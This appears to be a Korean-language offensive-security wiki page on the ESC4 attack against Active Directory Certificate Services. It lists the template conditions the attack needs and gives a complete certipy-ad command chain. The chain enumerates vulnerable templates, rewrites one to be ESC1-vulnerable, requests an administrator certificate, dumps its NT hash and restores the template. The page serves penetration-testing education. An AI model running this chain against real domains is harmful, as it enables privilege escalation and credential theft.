ESC4

ESC4은 다음과 같은 속성들이 모두 만족할 때 가능한 ADCS 공격입니다.

속성

Authorized Signatures Required

0

Requires Manager Approval

False

Enrollment Rights

공격자가 컨트롤 가능한 객체 이하의 권한

User ACL Principals

공격자가 컨트롤 가능한 객체

템플릿에 대해서 높은 권한을 가진 계정을 탈취하는데 성공하면 템플릿의 속성을 ESC1에 취약하게 변경할 수 있습니다.

Abuse

UNIX
# 취약한 템플릿 열거
certipy-ad find -u Mick3y -p 'Password123!' -dc-ip 192.168.1.11 -vulnerable -stdout -enabled

# 템플릿 속성 변경
certipy-ad template -u Mick3y -p 'Password123!' -dc-ip 192.168.1.11 -template ESC4 -write-default-configuration

# 템플릿을 통한 인증서 발급
certipy-ad req -u Mick3y -p 'Password123!' -dc-ip 192.168.1.11 -target AD01.CONTOSO.COM -ca CONTOSO-AD01-CA -template ESC4 -upn [email protected]

# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.11

# 템플릿 속성 복구
certipy-ad template -u Mick3y -p 'Password123!' -dc-ip 192.168.1.11 -template ESC4 -write-configuration ESC4.json -no-save

Root Cause

User ACL Principals

템플릿에 대해서 GenericAll, GenericWrite 권한이 있으면 해당 템플릿의 모든 속성을 ESC1에 적합하도록 변경할 수 있습니다. 악용을 위해 변경하는 속성들에 대한 설명은 ESC1을 참고하세요.

User ACL Principals

References

LogoActive Directory Certificate Services (ADCS – ESC4) | RBT SecurityRBT Security | Reinventing The Security
https://www.beyondtrust.com/blog/entry/esc4-attackswww.beyondtrust.com
Logoesc4Red Team Wiki
PreviousESC3NextESC5

Last updated

Was this helpful?